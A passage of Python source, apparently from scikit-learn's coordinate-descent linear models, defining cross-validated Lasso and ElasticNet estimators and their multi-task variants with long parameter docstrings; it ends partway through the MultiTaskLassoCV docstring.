    path_params['X_std'] = X_std
    path_params['precompute'] = precompute
    path_params['copy_X'] = False
    path_params['alphas'] = alphas

    if 'l1_ratio' in path_params:
        path_params['l1_ratio'] = l1_ratio

    # Do the ordering and type casting here, as if it is done in the path,
    # X is copied and a reference is kept here
    X_train = check_array(X_train, 'csc', dtype=dtype, order=X_order)
    alphas, coefs, _ = path(X_train, y_train, **path_params)
    del X_train, y_train

    if y.ndim == 1:
        # Doing this so that it becomes coherent with multioutput.
        coefs = coefs[np.newaxis, :, :]
        y_mean = np.atleast_1d(y_mean)
        y_test = y_test[:, np.newaxis]

    if normalize:
        nonzeros = np.flatnonzero(X_std)
        coefs[:, nonzeros] /= X_std[nonzeros][:, np.newaxis]

    intercepts = y_mean[:, np.newaxis] - np.dot(X_mean, coefs)
    if sparse.issparse(X_test):
        n_order, n_features, n_alphas = coefs.shape
        # Work around for sparse matices since coefs is a 3-D numpy array.
        coefs_feature_major = np.rollaxis(coefs, 1)
        feature_2d = np.reshape(coefs_feature_major, (n_features, -1))
        X_test_coefs = safe_sparse_dot(X_test, feature_2d)
        X_test_coefs = X_test_coefs.reshape(X_test.shape[0], n_order, -1)
    else:
        X_test_coefs = safe_sparse_dot(X_test, coefs)
    residues = X_test_coefs - y_test[:, :, np.newaxis]
    residues += intercepts
    this_mses = ((residues ** 2).mean(axis=0)).mean(axis=0)

    return this_mses


class LinearModelCV(six.with_metaclass(ABCMeta, LinearModel)):
    """Base class for iterative model fitting along a regularization path"""

    @abstractmethod
    def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
                 normalize=False, precompute='auto', max_iter=1000, tol=1e-4,
                 copy_X=True, cv=None, verbose=False, n_jobs=1,
                 positive=False, random_state=None, selection='cyclic'):
        self.eps = eps
        self.n_alphas = n_alphas
        self.alphas = alphas
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.precompute = precompute
        self.max_iter = max_iter
        self.tol = tol
        self.copy_X = copy_X
        self.cv = cv
        self.verbose = verbose
        self.n_jobs = n_jobs
        self.positive = positive
        self.random_state = random_state
        self.selection = selection

    def fit(self, X, y):
        """Fit linear model with coordinate descent

        Fit is on grid of alphas and best alpha estimated by cross-validation.

        Parameters
        ----------
        X : {array-like}, shape (n_samples, n_features)
            Training data. Pass directly as float64, Fortran-contiguous data
            to avoid unnecessary memory duplication. If y is mono-output,
            X can be sparse.
        y : array-like, shape (n_samples,) or (n_samples, n_targets)
            Target values
        """
        y = np.asarray(y, dtype=np.float64)

        # Presence of l1_ratio distinguishes ElasticNet-family subclasses
        # from Lasso-family ones.
        if hasattr(self, 'l1_ratio'):
            model_str = 'ElasticNet'
        else:
            model_str = 'Lasso'

        if isinstance(self, ElasticNetCV) or isinstance(self, LassoCV):
            if model_str == 'ElasticNet':
                model = ElasticNet()
            else:
                model = Lasso()
            if y.ndim > 1:
                raise ValueError("For multi-task outputs, use "
                                 "MultiTask%sCV" % (model_str))
        else:
            if sparse.isspmatrix(X):
                raise TypeError("X should be dense but a sparse matrix was"
                                "passed")
            elif y.ndim == 1:
                raise ValueError("For mono-task outputs, use "
                                 "%sCV" % (model_str))
            if model_str == 'ElasticNet':
                model = MultiTaskElasticNet()
            else:
                model = MultiTaskLasso()

        if self.selection not in ["random", "cyclic"]:
            raise ValueError("selection should be either random or cyclic.")

        # This makes sure that there is no duplication in memory.
        # Dealing right with copy_X is important in the following:
        # Multiple functions touch X and subsamples of X and can induce a
        # lot of duplication of memory
        copy_X = self.copy_X and self.fit_intercept

        if isinstance(X, np.ndarray) or sparse.isspmatrix(X):
            # Keep a reference to X
            reference_to_old_X = X
            # Let us not impose fortran ordering or float64 so far: it is
            # not useful for the cross-validation loop and will be done
            # by the model fitting itself
            X = check_array(X, 'csc', copy=False)
            if sparse.isspmatrix(X):
                if not np.may_share_memory(reference_to_old_X.data, X.data):
                    # X is a sparse matrix and has been copied
                    copy_X = False
            elif not np.may_share_memory(reference_to_old_X, X):
                # X has been copied
                copy_X = False
            del reference_to_old_X
        else:
            X = check_array(X, 'csc', dtype=np.float64, order='F', copy=copy_X)
            copy_X = False

        if X.shape[0] != y.shape[0]:
            raise ValueError("X and y have inconsistent dimensions (%d != %d)"
                             % (X.shape[0], y.shape[0]))

        # All LinearModelCV parameters except 'cv' are acceptable
        path_params = self.get_params()
        if 'l1_ratio' in path_params:
            l1_ratios = np.atleast_1d(path_params['l1_ratio'])
            # For the first path, we need to set l1_ratio
            path_params['l1_ratio'] = l1_ratios[0]
        else:
            l1_ratios = [1, ]
        path_params.pop('cv', None)
        path_params.pop('n_jobs', None)

        alphas = self.alphas
        n_l1_ratio = len(l1_ratios)
        if alphas is None:
            # One alpha grid per l1_ratio, derived from the data.
            alphas = []
            for l1_ratio in l1_ratios:
                alphas.append(_alpha_grid(
                    X, y, l1_ratio=l1_ratio,
                    fit_intercept=self.fit_intercept,
                    eps=self.eps, n_alphas=self.n_alphas,
                    normalize=self.normalize,
                    copy_X=self.copy_X))
        else:
            # Making sure alphas is properly ordered.
            alphas = np.tile(np.sort(alphas)[::-1], (n_l1_ratio, 1))
        # We want n_alphas to be the number of alphas used for each l1_ratio.
        n_alphas = len(alphas[0])
        path_params.update({'n_alphas': n_alphas})

        path_params['copy_X'] = copy_X
        # We are not computing in parallel, we can modify X
        # inplace in the folds
        if not (self.n_jobs == 1 or self.n_jobs is None):
            path_params['copy_X'] = False

        # init cross-validation generator
        cv = check_cv(self.cv, X)

        # Compute path for all folds and compute MSE to get the best alpha
        folds = list(cv)
        best_mse = np.inf

        # We do a double for loop folded in one, in order to be able to
        # iterate in parallel on l1_ratio and folds
        jobs = (delayed(_path_residuals)(X, y, train, test, self.path,
                                         path_params, alphas=this_alphas,
                                         l1_ratio=this_l1_ratio, X_order='F',
                                         dtype=np.float64)
                for this_l1_ratio, this_alphas in zip(l1_ratios, alphas)
                for train, test in folds)
        mse_paths = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
                             backend="threading")(jobs)
        mse_paths = np.reshape(mse_paths, (n_l1_ratio, len(folds), -1))
        mean_mse = np.mean(mse_paths, axis=1)
        self.mse_path_ = np.squeeze(np.rollaxis(mse_paths, 2, 1))
        for l1_ratio, l1_alphas, mse_alphas in zip(l1_ratios, alphas,
                                                   mean_mse):
            i_best_alpha = np.argmin(mse_alphas)
            this_best_mse = mse_alphas[i_best_alpha]
            if this_best_mse < best_mse:
                best_alpha = l1_alphas[i_best_alpha]
                best_l1_ratio = l1_ratio
                best_mse = this_best_mse

        self.l1_ratio_ = best_l1_ratio
        self.alpha_ = best_alpha
        if self.alphas is None:
            self.alphas_ = np.asarray(alphas)
            if n_l1_ratio == 1:
                self.alphas_ = self.alphas_[0]
        # Remove duplicate alphas in case alphas is provided.
        else:
            self.alphas_ = np.asarray(alphas[0])

        # Refit the model with the parameters selected
        common_params = dict((name, value)
                             for name, value in self.get_params().items()
                             if name in model.get_params())
        model.set_params(**common_params)
        model.alpha = best_alpha
        model.l1_ratio = best_l1_ratio
        model.copy_X = copy_X
        model.precompute = False
        model.fit(X, y)
        if not hasattr(self, 'l1_ratio'):
            del self.l1_ratio_
        self.coef_ = model.coef_
        self.intercept_ = model.intercept_
        self.dual_gap_ = model.dual_gap_
        self.n_iter_ = model.n_iter_
        return self


class LassoCV(LinearModelCV, RegressorMixin):
    """Lasso linear model with iterative fitting along a regularization path

    The best model is selected by cross-validation.

    The optimization objective for Lasso is::

        (1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1

    Parameters
    ----------
    eps : float, optional
        Length of the path. ``eps=1e-3`` means that
        ``alpha_min / alpha_max = 1e-3``.

    n_alphas : int, optional
        Number of alphas along the regularization path

    alphas : numpy array, optional
        List of alphas where to compute the models.
        If ``None`` alphas are set automatically

    precompute : True | False | 'auto' | array-like
        Whether to use a precomputed Gram matrix to speed up
        calculations. If set to ``'auto'`` let us decide. The Gram
        matrix can also be passed as argument.

    max_iter : int, optional
        The maximum number of iterations

    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.

    cv : integer or cross-validation generator, optional
        If an integer is passed, it is the number of fold (default 3).
        Specific cross-validation objects can be passed, see the
        :mod:`sklearn.cross_validation` module for the list of possible
        objects.
    verbose : bool or integer
        Amount of verbosity.

    n_jobs : integer, optional
        Number of CPUs to use during the cross validation. If ``-1``, use
        all the CPUs.

    positive : bool, optional
        If positive, restrict regression coefficients to be positive

    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.

    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.

    fit_intercept : boolean, default True
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.

    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.

    Attributes
    ----------
    alpha_ : float
        The amount of penalization chosen by cross validation

    coef_ : array, shape = (n_features,) | (n_targets, n_features)
        parameter vector (w in the cost function formula)

    intercept_ : float | array, shape = (n_targets,)
        independent term in decision function.

    mse_path_ : array, shape = (n_alphas, n_folds)
        mean square error for the test set on each fold, varying alpha

    alphas_ : numpy array, shape = (n_alphas,)
        The grid of alphas used for fitting

    dual_gap_ : ndarray, shape ()
        The dual gap at the end of the optimization for the optimal alpha
        (``alpha_``).

    n_iter_ : int
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance for the optimal alpha.

    Notes
    -----
    See examples/linear_model/lasso_path_with_crossvalidation.py
    for an example.

    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.

    See also
    --------
    lars_path
    lasso_path
    LassoLars
    Lasso
    LassoLarsCV
    """
    path = staticmethod(lasso_path)

    def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
                 normalize=False, precompute='auto', max_iter=1000, tol=1e-4,
                 copy_X=True, cv=None, verbose=False, n_jobs=1,
                 positive=False, random_state=None, selection='cyclic'):
        super(LassoCV, self).__init__(
            eps=eps, n_alphas=n_alphas, alphas=alphas,
            fit_intercept=fit_intercept, normalize=normalize,
            precompute=precompute, max_iter=max_iter, tol=tol, copy_X=copy_X,
            cv=cv, verbose=verbose, n_jobs=n_jobs, positive=positive,
            random_state=random_state, selection=selection)


class ElasticNetCV(LinearModelCV, RegressorMixin):
    """Elastic Net model with iterative fitting along a regularization path

    The best model is selected by cross-validation.

    Parameters
    ----------
    l1_ratio : float, optional
        float between 0 and 1 passed to ElasticNet (scaling between
        l1 and l2 penalties). For ``l1_ratio = 0``
        the penalty is an L2 penalty. For ``l1_ratio = 1`` it is an L1 penalty.
        For ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2
        This parameter can be a list, in which case the different
        values are tested by cross-validation and the one giving the best
        prediction score is used. Note that a good choice of list of
        values for l1_ratio is often to put more values close to 1
        (i.e. Lasso) and less close to 0 (i.e. Ridge), as in ``[.1, .5, .7,
        .9, .95, .99, 1]``

    eps : float, optional
        Length of the path. ``eps=1e-3`` means that
        ``alpha_min / alpha_max = 1e-3``.

    n_alphas : int, optional
        Number of alphas along the regularization path, used for each l1_ratio.

    alphas : numpy array, optional
        List of alphas where to compute the models.
        If None alphas are set automatically

    precompute : True | False | 'auto' | array-like
        Whether to use a precomputed Gram matrix to speed up
        calculations. If set to ``'auto'`` let us decide. The Gram
        matrix can also be passed as argument.

    max_iter : int, optional
        The maximum number of iterations

    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.

    cv : integer or cross-validation generator, optional
        If an integer is passed, it is the number of fold (default 3).
        Specific cross-validation objects can be passed, see the
        :mod:`sklearn.cross_validation` module for the list of possible
        objects.

    verbose : bool or integer
        Amount of verbosity.

    n_jobs : integer, optional
        Number of CPUs to use during the cross validation. If ``-1``, use
        all the CPUs.

    positive : bool, optional
        When set to ``True``, forces the coefficients to be positive.

    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.

    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.

    fit_intercept : boolean
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.

    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.

    Attributes
    ----------
    alpha_ : float
        The amount of penalization chosen by cross validation

    l1_ratio_ : float
        The compromise between l1 and l2 penalization chosen by
        cross validation

    coef_ : array, shape = (n_features,) | (n_targets, n_features)
        Parameter vector (w in the cost function formula),

    intercept_ : float | array, shape = (n_targets, n_features)
        Independent term in the decision function.

    mse_path_ : array, shape = (n_l1_ratio, n_alpha, n_folds)
        Mean square error for the test set on each fold, varying l1_ratio and
        alpha.

    alphas_ : numpy array, shape = (n_alphas,) or (n_l1_ratio, n_alphas)
        The grid of alphas used for fitting, for each l1_ratio.

    n_iter_ : int
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance for the optimal alpha.

    Notes
    -----
    See examples/linear_model/lasso_path_with_crossvalidation.py
    for an example.

    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.

    The parameter l1_ratio corresponds to alpha in the glmnet R package
    while alpha corresponds to the lambda parameter in glmnet.
    More specifically, the optimization objective is::

        1 / (2 * n_samples) * ||y - Xw||^2_2 +
        + alpha * l1_ratio * ||w||_1
        + 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2

    If you are interested in controlling the L1 and L2 penalty
    separately, keep in mind that this is equivalent to::

        a * L1 + b * L2

    for::

        alpha = a + b and l1_ratio = a / (a + b).

    See also
    --------
    enet_path
    ElasticNet

    """
    path = staticmethod(enet_path)

    def __init__(self, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
                 fit_intercept=True, normalize=False, precompute='auto',
                 max_iter=1000, tol=1e-4, cv=None, copy_X=True,
                 verbose=0, n_jobs=1, positive=False, random_state=None,
                 selection='cyclic'):
        self.l1_ratio = l1_ratio
        self.eps = eps
        self.n_alphas = n_alphas
        self.alphas = alphas
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.precompute = precompute
        self.max_iter = max_iter
        self.tol = tol
        self.cv = cv
        self.copy_X = copy_X
        self.verbose = verbose
        self.n_jobs = n_jobs
        self.positive = positive
        self.random_state = random_state
        self.selection = selection


###############################################################################
# Multi Task ElasticNet and Lasso models (with joint feature selection)

class MultiTaskElasticNet(Lasso):
    """Multi-task ElasticNet model trained with L1/L2 mixed-norm as regularizer

    The optimization objective for MultiTaskElasticNet is::

        (1 / (2 * n_samples)) * ||Y - XW||^Fro_2
        + alpha * l1_ratio * ||W||_21
        + 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2

    Where::

        ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}

    i.e. the sum of norm of each row.

    Parameters
    ----------
    alpha : float, optional
        Constant that multiplies the L1/L2 term. Defaults to 1.0

    l1_ratio : float
        The ElasticNet mixing parameter, with 0 < l1_ratio <= 1.
        For l1_ratio = 0 the penalty is an L1/L2 penalty. For l1_ratio = 1 it
        is an L1 penalty.
        For ``0 < l1_ratio < 1``, the penalty is a combination of L1/L2 and L2.

    fit_intercept : boolean
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.

    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.
    max_iter : int, optional
        The maximum number of iterations

    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.

    warm_start : bool, optional
        When set to ``True``, reuse the solution of the previous call to fit as
        initialization, otherwise, just erase the previous solution.

    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.

    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.

    Attributes
    ----------
    intercept_ : array, shape = (n_tasks,)
        Independent term in decision function.

    coef_ : array, shape = (n_tasks, n_features)
        Parameter vector (W in the cost function formula). If a 1D y is \
        passed in at fit (non multi-task usage), ``coef_`` is then a 1D array

    n_iter_ : int
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance.

    Examples
    --------
    >>> from sklearn import linear_model
    >>> clf = linear_model.MultiTaskElasticNet(alpha=0.1)
    >>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]])
    ... #doctest: +NORMALIZE_WHITESPACE
    MultiTaskElasticNet(alpha=0.1, copy_X=True, fit_intercept=True,
            l1_ratio=0.5, max_iter=1000, normalize=False, random_state=None,
            selection='cyclic', tol=0.0001, warm_start=False)
    >>> print(clf.coef_)
    [[ 0.45663524  0.45612256]
     [ 0.45663524  0.45612256]]
    >>> print(clf.intercept_)
    [ 0.0872422  0.0872422]

    See also
    --------
    ElasticNet, MultiTaskLasso

    Notes
    -----
    The algorithm used to fit the model is coordinate descent.

    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.
    """
    def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True,
                 normalize=False, copy_X=True, max_iter=1000, tol=1e-4,
                 warm_start=False, random_state=None, selection='cyclic'):
        self.l1_ratio = l1_ratio
        self.alpha = alpha
        self.coef_ = None
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.max_iter = max_iter
        self.copy_X = copy_X
        self.tol = tol
        self.warm_start = warm_start
        self.random_state = random_state
        self.selection = selection

    def fit(self, X, y):
        """Fit MultiTaskElasticNet model with coordinate descent

        Parameters
        -----------
        X : ndarray, shape = (n_samples, n_features)
            Data
        y : ndarray, shape = (n_samples, n_tasks)
            Target

        Notes
        -----

        Coordinate descent is an algorithm that considers each column of
        data at a time hence it will automatically convert the X input
        as a Fortran-contiguous numpy array if necessary.

        To avoid memory re-allocation it is advised to allocate the
        initial data in memory directly using that format.
        """
        # X and y must be of type float64
        X = check_array(X, dtype=np.float64, order='F',
                        copy=self.copy_X and self.fit_intercept)
        y = np.asarray(y, dtype=np.float64)

        if hasattr(self, 'l1_ratio'):
            model_str = 'ElasticNet'
        else:
            model_str = 'Lasso'
        if y.ndim == 1:
            raise ValueError("For mono-task outputs, use %s" % model_str)

        n_samples, n_features = X.shape
        _, n_tasks = y.shape

        if n_samples != y.shape[0]:
            raise ValueError("X and y have inconsistent dimensions (%d != %d)"
                             % (n_samples, y.shape[0]))

        X, y, X_mean, y_mean, X_std = center_data(
            X, y, self.fit_intercept, self.normalize, copy=False)

        if not self.warm_start or self.coef_ is None:
            self.coef_ = np.zeros((n_tasks, n_features), dtype=np.float64,
                                  order='F')

        l1_reg = self.alpha * self.l1_ratio * n_samples
        l2_reg = self.alpha * (1.0 - self.l1_ratio) * n_samples

        self.coef_ = np.asfortranarray(self.coef_)  # coef contiguous in memory

        if self.selection not in ['random', 'cyclic']:
            raise ValueError("selection should be either random or cyclic.")
        random = (self.selection == 'random')

        self.coef_, self.dual_gap_, self.eps_, self.n_iter_ = \
            cd_fast.enet_coordinate_descent_multi_task(
                self.coef_, l1_reg, l2_reg, X, y, self.max_iter, self.tol,
                check_random_state(self.random_state), random)

        self._set_intercept(X_mean, y_mean, X_std)

        if self.dual_gap_ > self.eps_:
            warnings.warn('Objective did not converge, you might want'
                          ' to increase the number of iterations')

        # return self for chaining fit and predict calls
        return self


class MultiTaskLasso(MultiTaskElasticNet):
    """Multi-task Lasso model trained with L1/L2 mixed-norm as regularizer

    The optimization objective for Lasso is::

        (1 / (2 * n_samples)) * ||Y - XW||^2_Fro + alpha * ||W||_21

    Where::

        ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}

    i.e. the sum of norm of earch row.

    Parameters
    ----------
    alpha : float, optional
        Constant that multiplies the L1/L2 term. Defaults to 1.0

    fit_intercept : boolean
        whether to calculate the intercept for this model.
        If set to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.

    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.

    max_iter : int, optional
        The maximum number of iterations

    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.

    warm_start : bool, optional
        When set to ``True``, reuse the solution of the previous call to fit as
        initialization, otherwise, just erase the previous solution.

    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4

    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.

    Attributes
    ----------
    coef_ : array, shape = (n_tasks, n_features)
        parameter vector (W in the cost function formula)

    intercept_ : array, shape = (n_tasks,)
        independent term in decision function.

    n_iter_ : int
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance.

    Examples
    --------
    >>> from sklearn import linear_model
    >>> clf = linear_model.MultiTaskLasso(alpha=0.1)
    >>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]])
    MultiTaskLasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000,
            normalize=False, random_state=None, selection='cyclic', tol=0.0001,
            warm_start=False)
    >>> print(clf.coef_)
    [[ 0.89393398  0.        ]
     [ 0.89393398  0.        ]]
    >>> print(clf.intercept_)
    [ 0.10606602  0.10606602]

    See also
    --------
    Lasso, MultiTaskElasticNet

    Notes
    -----
    The algorithm used to fit the model is coordinate descent.

    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.
    """
    def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
                 copy_X=True, max_iter=1000, tol=1e-4, warm_start=False,
                 random_state=None, selection='cyclic'):
        self.alpha = alpha
        self.coef_ = None
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.max_iter = max_iter
        self.copy_X = copy_X
        self.tol = tol
        self.warm_start = warm_start
        # Pure L1/L2 penalty: fix the ElasticNet mixing parameter at 1.
        self.l1_ratio = 1.0
        self.random_state = random_state
        self.selection = selection


class MultiTaskElasticNetCV(LinearModelCV, RegressorMixin):
    """Multi-task L1/L2 ElasticNet with built-in cross-validation.

    The optimization objective for MultiTaskElasticNet is::

        (1 / (2 * n_samples)) * ||Y - XW||^Fro_2
        + alpha * l1_ratio * ||W||_21
        + 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2

    Where::

        ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}

    i.e. the sum of norm of each row.

    Parameters
    ----------
    eps : float, optional
        Length of the path. ``eps=1e-3`` means that
        ``alpha_min / alpha_max = 1e-3``.

    alphas : array-like, optional
        List of alphas where to compute the models.
        If not provided, set automatically.

    n_alphas : int, optional
        Number of alphas along the regularization path

    l1_ratio : float or array of floats
        The ElasticNet mixing parameter, with 0 < l1_ratio <= 1.
        For l1_ratio = 0 the penalty is an L1/L2 penalty. For l1_ratio = 1 it
        is an L1 penalty.
        For ``0 < l1_ratio < 1``, the penalty is a combination of L1/L2 and L2.

    fit_intercept : boolean
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.

    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.

    max_iter : int, optional
        The maximum number of iterations

    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.

    cv : integer or cross-validation generator, optional
        If an integer is passed, it is the number of fold (default 3).
        Specific cross-validation objects can be passed, see the
        :mod:`sklearn.cross_validation` module for the list of possible
        objects.

    verbose : bool or integer
        Amount of verbosity.

    n_jobs : integer, optional
        Number of CPUs to use during the cross validation. If ``-1``, use
        all the CPUs. Note that this is used only if multiple values for
        l1_ratio are given.

    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.

    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.

    Attributes
    ----------
    intercept_ : array, shape (n_tasks,)
        Independent term in decision function.

    coef_ : array, shape (n_tasks, n_features)
        Parameter vector (W in the cost function formula).

    alpha_ : float
        The amount of penalization chosen by cross validation

    mse_path_ : array, shape (n_alphas, n_folds) or
                (n_l1_ratio, n_alphas, n_folds)
        mean square error for the test set on each fold, varying alpha

    alphas_ : numpy array, shape (n_alphas,) or (n_l1_ratio, n_alphas)
        The grid of alphas used for fitting, for each l1_ratio

    l1_ratio_ : float
        best l1_ratio obtained by cross-validation.

    n_iter_ : int
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance for the optimal alpha.

    Examples
    --------
    >>> from sklearn import linear_model
    >>> clf = linear_model.MultiTaskElasticNetCV()
    >>> clf.fit([[0,0], [1, 1], [2, 2]],
    ...         [[0, 0], [1, 1], [2, 2]])
    ... #doctest: +NORMALIZE_WHITESPACE
    MultiTaskElasticNetCV(alphas=None, copy_X=True, cv=None, eps=0.001,
           fit_intercept=True, l1_ratio=0.5, max_iter=1000, n_alphas=100,
           n_jobs=1, normalize=False, random_state=None, selection='cyclic',
           tol=0.0001, verbose=0)
    >>> print(clf.coef_)
    [[ 0.52875032  0.46958558]
     [ 0.52875032  0.46958558]]
    >>> print(clf.intercept_)
    [ 0.00166409  0.00166409]

    See also
    --------
    MultiTaskElasticNet
    ElasticNetCV
    MultiTaskLassoCV

    Notes
    -----
    The algorithm used to fit the model is coordinate descent.

    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.
    """
    path = staticmethod(enet_path)

    def __init__(self, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
                 fit_intercept=True, normalize=False,
                 max_iter=1000, tol=1e-4, cv=None, copy_X=True,
                 verbose=0, n_jobs=1, random_state=None, selection='cyclic'):
        self.l1_ratio = l1_ratio
        self.eps = eps
        self.n_alphas = n_alphas
        self.alphas = alphas
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.max_iter = max_iter
        self.tol = tol
        self.cv = cv
        self.copy_X = copy_X
        self.verbose = verbose
        self.n_jobs = n_jobs
        self.random_state = random_state
        self.selection = selection


class MultiTaskLassoCV(LinearModelCV, RegressorMixin):
    """Multi-task L1/L2 Lasso with built-in cross-validation.

    The optimization objective for MultiTaskLasso is::

        (1 / (2 * n_samples)) * ||Y - XW||^Fro_2 + alpha * ||W||_21

    Where::

        ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}

    i.e. the sum of norm of each row.

    Parameters
    ----------
    eps : float, optional
        Length of the path. ``eps=1e-3`` means that
        ``alpha_min / alpha_max = 1e-3``.
alphas : array-like, optional List of alphas where to compute the models. If not provided, set automaticlly. n_alphas : int, optional Number of alphas along the regularization path fit_intercept : boolean whether to calculate the intercept for this model. If set to false, no intercept will be used in calculations (e.g. data is expected to be already centered). normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. max_iter : int, optional The maximum number of iterations. tol : float, optional The tolerance for the optimization: if the updates are smaller than ``tol``, the optimization code checks the dual gap for optimality and continues until it is smaller than ``tol``. cv : integer or cross-validation generator, optional If an integer is passed, it is the number of fold (default 3). Specific cross-validation objects can be passed, see the :mod:`sklearn.cross_validation` module for the list of possible objects. verbose : bool or integer Amount of verbosity. n_jobs : integer, optional Number of CPUs to use during the cross validation. If ``-1``, use all the CPUs. Note that this is used only if multiple values for l1_ratio are given. selection : str, default 'cyclic' If set to 'random', a random coefficient is updated every iteration rather than looping over features sequentially by default. This (setting to 'random') often leads to significantly faster convergence especially when tol is higher than 1e-4. random_state : int, RandomState instance, or None (default) The seed of the pseudo random number generator that selects a random feature to update. Useful only when selection is set to 'random'. Attributes ---------- intercept_ : array, shape (n_tasks,) Independent term in decision function. coef_ : array, shape (n_tasks, n_features) Parameter vector (W in the cost function formula). 
